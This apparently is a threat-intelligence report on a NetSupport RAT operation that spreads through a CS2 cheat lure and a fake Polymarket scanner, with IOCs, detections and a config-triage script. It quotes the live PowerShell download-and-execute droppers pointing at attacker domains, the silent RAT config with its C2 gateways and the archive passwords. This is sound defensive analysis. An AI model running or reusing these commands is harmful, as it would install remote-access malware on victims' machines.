Two Lures, One Operator: NetSupport RAT Ships on CS2 Cheats and a Fake Polymarket Whale Scanner From a Single Proton66 Server
TL;DR
On April 8, 2026, a tiny 81-byte PowerShell dropper named iridia.ps1 surfaced on MalwareBazaar (reported by burger403). Following the breadcrumbs leads to a dual-lure NetSupport Manager RAT operation run by a single operator out of a single Russian bulletproof host:
- A CS2 "Iridia Cheats" lure at iridiacheats.dev
- A "Polymarket Smart Money Scanner" whale-tracker lure at polymarketscanner.dev
Both lures deliver identical NetSupport RAT binaries, use the same 7-Zip archive passwords (falos / ilil), and beacon to four C2 domains that all resolve to the same IP: 193.143.1.21 — a Windows server in St. Petersburg on Proton66 OOO (AS198953), a Russian hoster with a long track record as a bulletproof provider.
What this report adds to the public record:
- Links the iridiacheats.dev CS2 cheat lure and the polymarketscanner.dev Polymarket scanner lure to a single operator via identical RAT binaries, 7z passwords, gateway config templates, and build-machine artifacts
- Captures several operator OPSEC failures: a pirated NetSupport license (`NSM1234`), a build-machine hostname (`ultimate-intel0`), a C2-server hostname exposed via RDP certificate (`WIN-425ORDLIMJB`), and an administrator SID from the build machine
- Documents the actor's User-Agent-gated payload delivery — the distribution endpoints return the malicious loader only to PowerShell user agents and serve a Cloudflare 403 to browsers
- Notes an older Polymarket C2 tier that predates the current campaign by nearly three months (registered Jan 22, 2026), suggesting the Polymarket infrastructure was pre-staged before the actor layered in the CS2 lure earlier this month
Hat tip to burger403 for the sample on MalwareBazaar. If you've published prior reporting on this operator, the ultimate-intel0 build artifact, the NSM1234 license, or the Proton66 WIN-425ORDLIMJB node, please reach out — we'll update and credit.
The Sample
| Field | Value |
|---|---|
| Filename | iridia.ps1 |
| File Type | PowerShell script, 81 bytes |
| SHA256 | d38bf86953ccbdf85f3f371cc196abc43d415d5ea19751181551a0e530662083 |
| MD5 | 7d60d78db2c86ba4871eb03b94e9b27c |
| First seen on MalwareBazaar | 2026-04-08 09:37 UTC |
| Reporter | burger403 |
| MB Tags | NetSupport, ps1, RAT |
The full content of the dropper is a one-liner:
```powershell
powershell -command "$install='CS2 MOD'; iwr iridiacheats.dev/install -useb| iex"
```
`$install` is a campaign tracker. `-useb` is shorthand for `-UseBasicParsing` (PowerShell resolves unambiguous parameter prefixes), which suppresses the legacy Internet Explorer parser.
Infection Chain
```text
Stage 1  iridia.ps1 (81B) → iex (irm iridiacheats.dev/install)
Stage 2  Obfuscated IEX: sv o ie; .((gv o).Value+'X')(irm iridiacheats.dev/fal.php)
Stage 3  fal.php (675B) → creates %LOCALAPPDATA%\NetService\
         downloads gggs.7z (pw: falos), lin.7z (pw: ilil), 7z.exe, 7z.dll
         launches Service.exe via explorer.exe (PPID spoof)
Stage 4  NetSupport RAT → client32.exe + PCICL32.DLL
         C2: kssaprraemdda.com:443 / psosenslsddaev.com:443
```
The distribution endpoint is User-Agent gated. A curl or browser user agent to https://iridiacheats.dev/install returns a Cloudflare 403 block page. Only PowerShell user agents receive the obfuscated loader. That loader uses variable indirection to construct the string `iex`:
```powershell
sv o ie                       # $o = 'ie'
.((gv o).Value + 'X')         # invoke ('ie' + 'X') = iex
(irm https://iridiacheats.dev/fal.php)
```
fal.php drops NetSupport Manager 12.01 with a v10.60 loader stub, installs into %LOCALAPPDATA%\NetService\, launches Service.exe through explorer.exe for PPID spoofing, and drops service.lnk into the Startup folder for persistence. The client32.ini is configured for fully silent operation:
```ini
[Client]
ShowUIOnConnect=0
silent=1
SysTray=0
SKMode=1
DisableDisconnect=1
DisableClientConnect=1
[HTTP]
GatewayAddress=kssaprraemdda.com:443
SecondaryGateway=psosenslsddaev.com:443
Port=443
```
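A small triage helper, added here as an example and not part of the report's tooling, that parses a `client32.ini` like the one above and flags the silent-operation keys together with the HTTP gateway hosts. The sample INI is constructed from the keys quoted in the report; the `Filename=` key under `[_Info]` is an assumed name for the workspace-path field, not a documented NetSupport key.

```python
import configparser

# Constructed sample client32.ini (not a captured file): the keys quoted in the
# report, plus an assumed [_Info] key name for the workspace path.
SAMPLE_INI = r"""
[_Info]
Filename=C:\Users\Administrator\Desktop\client32u.ini
[Client]
ShowUIOnConnect=0
silent=1
SysTray=0
SKMode=1
DisableDisconnect=1
DisableClientConnect=1
[HTTP]
GatewayAddress=kssaprraemdda.com:443
SecondaryGateway=psosenslsddaev.com:443
Port=443
"""

# Key/value pairs that together describe a client hidden from the logged-on user
SILENT_KEYS = {
    "showuionconnect": "0", "silent": "1", "systray": "0",
    "skmode": "1", "disabledisconnect": "1", "disableclientconnect": "1",
}

def parse_client32(text):
    """Return silent-mode hits, HTTP gateways and the [_Info] workspace path."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)  # option names are lower-cased by default
    client = cp["Client"] if cp.has_section("Client") else {}
    http = cp["HTTP"] if cp.has_section("HTTP") else {}
    info = cp["_Info"] if cp.has_section("_Info") else {}
    return {
        "silent_hits": [k for k, v in SILENT_KEYS.items() if client.get(k) == v],
        "gateways": [http[k] for k in ("gatewayaddress", "secondarygateway") if http.get(k)],
        "workspace": info.get("filename"),
    }

def assess(text):
    """Flag a config that both hides the client and points at external gateways."""
    result = parse_client32(text)
    hidden = len(result["silent_hits"]) >= 3
    result["verdict"] = "SUSPICIOUS" if hidden and result["gateways"] else "REVIEW"
    return result
```

The gateway hosts it extracts are the values to cross-check against the C2 domains in the IOC section.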
Two Lures, One Operator
| Attribute | Iridia (CS2 cheats) | Polymarket (whale scanner) |
|---|---|---|
| Distribution domain | iridiacheats.dev | polymarketscanner.dev |
| Domain created | 2026-04-06 | 2026-04-02 |
| Payload archive | gggs.7z | at.7z |
| Primary C2 | kssaprraemdda.com | jakkakaskakasj.com |
| Secondary C2 | psosenslsddaev.com | jasjdpoekkqwda.com |
| C2 registered | 2026-04-06 | 2026-01-22 |
| RAT binaries | Identical | Identical |
| 7z passwords | falos / ilil | falos / ilil |
| Gateway security key pattern | FJ;M@CDG9J=PBEGG;N@DDH | FL;B@EDI9D>GBMGH<BAEEK:F>L |
| Decoy UI | Plain "Installation complete!" | Full fake "Polymarket Smart Money Scanner v3.8.1 (Stealth Edition)" console |
The Polymarket branch ships a ~400-line PowerShell decoy that simulates a live whale-tracking console — fake wallet fingerprinting with progress bars, fake cross-chain flow traces (Polygon, Base, Arbitrum), fabricated high-winrate wallet clusters with realistic position sizes, a fake "$12.84M inflow" alert across correlated markets, and a countdown timer suggesting a live refresh. Its purpose is purely to keep the victim watching the screen while the RAT finishes installing in the background.
Infrastructure Map
```text
Distribution tier (Cloudflare)
├── iridiacheats.dev      → 104.21.52.179 (CF)
└── polymarketscanner.dev → 104.21.14.134 (CF)
        │
        ▼ payload pull
┌────────────────────────────────────────────┐
│ C2 tier                                    │
│ 193.143.1.21 — Proton66 OOO, RU            │
│ Hostname: WIN-425ORDLIMJB                  │
│                                            │
│ Port 443  NSM Gateway                      │
│ Port 3389 RDP (operator access)            │
│                                            │
│ kssaprraemdda.com  (Iridia primary)        │
│ psosenslsddaev.com (Iridia backup)         │
│ jakkakaskakasj.com (Poly primary)          │
│ jasjdpoekkqwda.com (Poly backup)           │
└────────────────────────────────────────────┘
```
All four C2 domains were registered through NiceNIC (Hong Kong) in two bursts — the Polymarket pair in January 2026, within 100 minutes of each other, and the Iridia pair on April 6 within 16 minutes of each other. Every domain resolves to a single server at 193.143.1.21 — same provider, same box, same hostname.
The C2 box
| Attribute | Value |
|---|---|
| IP | 193.143.1.21 |
| Hostname (RDP cert) | WIN-425ORDLIMJB |
| RDP cert created | 2026-02-05 15:56 UTC |
| OS | Windows (via nmap) |
| Open ports | 443 (NSM Gateway), 3389 (RDP) |
| Provider | Proton66 OOO |
| ASN | AS198953 |
| Location | St. Petersburg, Russia |
| Network | 193.143.1.0/24 |
| Abuse | abuse@proton66.ru |
Proton66 has been repeatedly named in community threat intelligence as a bulletproof host; its registered address — District No. 54, Iskrovsky Pr-kt, D. 21, Lit. U, Kv. 218, 193230, St. Petersburg — has hosted C2 infrastructure across multiple unrelated campaigns this year alone.
Operator OPSEC Failures
- Pirated NetSupport license — serial `NSM1234`, licensee `NSM1234`. A $500+ commercial remote-access product being distributed with a throwaway serial is not exactly a subtle identifier.
- Build machine hostname leak — the `.lnk` metadata in `service.lnk` exposes the build-machine path `C:\Users\Administrator\AppData\Local\NetService\service.exe` and the hostname `ultimate-intel0`.
- Build machine SID — `S-1-5-21-3340606691-2803584206-3274291654-500` (built-in Administrator). Unique to the actor's development box.
- C2 server hostname via RDP cert — `WIN-425ORDLIMJB`, certificate created 2026-02-05. Pivotable across Censys/Shodan historical data.
- Single-IP consolidation — one box serves both lure campaigns, one RDP port exposes the operator.
- Registrar clustering — all four C2 domains registered at NiceNIC HK. One abuse report, four takedowns.
- Temporal bursts — domains registered within minutes of each other. Makes this pattern trivially pivotable.
- Workspace path leak — `[_Info]` in `client32.ini` reveals the file was edited at `C:\Users\Administrator\Desktop\client32u.ini`.
Confidence Notes
Medium confidence — single operator. Insufficient data to name an individual, but the operational fingerprint is coherent: identical binaries across both campaigns, identical archive passwords, identical gateway config template, same RAT install path, same build-machine artifacts in .lnk metadata, and a shared C2 server. The longer-lived Polymarket infrastructure (Jan 22) suggests the actor pre-staged the whale-tracker campaign months before layering the CS2 cheat lure on top of it earlier this month.
Target profile: gamers chasing CS2 cheats and crypto/prediction-market traders chasing Polymarket edge. Monetization is most likely some combination of access resale, wallet theft, and credential harvesting via a downstream stealer.
Detections & Hunting
- Network: block `193.143.1.21`, plus all six domains listed below. NetSupport Manager gateway traffic on 443 can be identified by the absence of a valid TLS cert (raw NSM protocol on the HTTPS port).
- Endpoint: alert on `%LOCALAPPDATA%\NetService\` directory creation, on `Service.exe` running from non-standard paths, and on `PCICL32.DLL` sideloading events.
- Process: PowerShell running `iwr` + `iex` against `.dev` TLDs with `-useb` is a strong first-cut filter, particularly when the parent process is `explorer.exe`.
- Startup persistence: any new `.lnk` dropped under `%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\` pointing into `NetService`.
IOCs
Dropper chain
| SHA256 | File |
|---|---|
| d38bf86953ccbdf85f3f371cc196abc43d415d5ea19751181551a0e530662083 | iridia.ps1 |
| 0c36c1062ada3b12c771e94a125233f76c8d1a73108fb68b225605313a533197 | fal.php |
| afe6bc8f12b08c0d52a20a4ef96c00c2187711348d5a4419ed96edff16fd4d15 | gggs.7z (Iridia) |
| 3084c055d2d79212308051a05f1859053cf0e313792d0b2658fa47b4e027bcb6 | at.7z (Polymarket) |
| 47f53b727d4e09c44c5595c747956ac5b4801341e1bb9195f31cec33548abf66 | lin.7z |
NetSupport RAT components
| SHA256 | File |
|---|---|
| 275e5b085534f64313b50cbdcb08ecd59c57d21c96bb937f140ee92a3d27f792 | Service.exe |
| b6d4ad0231941e0637485ac5833e0fdc75db35289b54e70f3858b70d36d04c80 | PCICL32.DLL |
| 2cc8ebea55c06981625397b04575ed0eaad9bb9f9dc896355c011a62febe49b5 | AudioCapture.dll |
| 52506d242a55051fd78ca4aa28b347fa14cdcc495f83a4e8a3aec36e1c73b4ea | service.lnk |
Network
| Indicator | Role |
|---|---|
| 193.143.1.21 | C2 server (Proton66, RU) |
| kssaprraemdda.com | Iridia primary C2 |
| psosenslsddaev.com | Iridia secondary C2 |
| jakkakaskakasj.com | Polymarket primary C2 |
| jasjdpoekkqwda.com | Polymarket secondary C2 |
| iridiacheats.dev | Iridia distribution (CF) |
| polymarketscanner.dev | Polymarket distribution (CF) |
Host
| Indicator | Role |
|---|---|
| %LOCALAPPDATA%\NetService\ | RAT install directory |
| %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\service.lnk | Startup persistence |
| WIN-425ORDLIMJB | C2 server hostname |
| ultimate-intel0 | Build machine hostname |
| S-1-5-21-3340606691-2803584206-3274291654-500 | Build machine Administrator SID |
| NSM1234 | Pirated NetSupport license |
GHOST — Breakglass Intelligence "One indicator. Total infrastructure."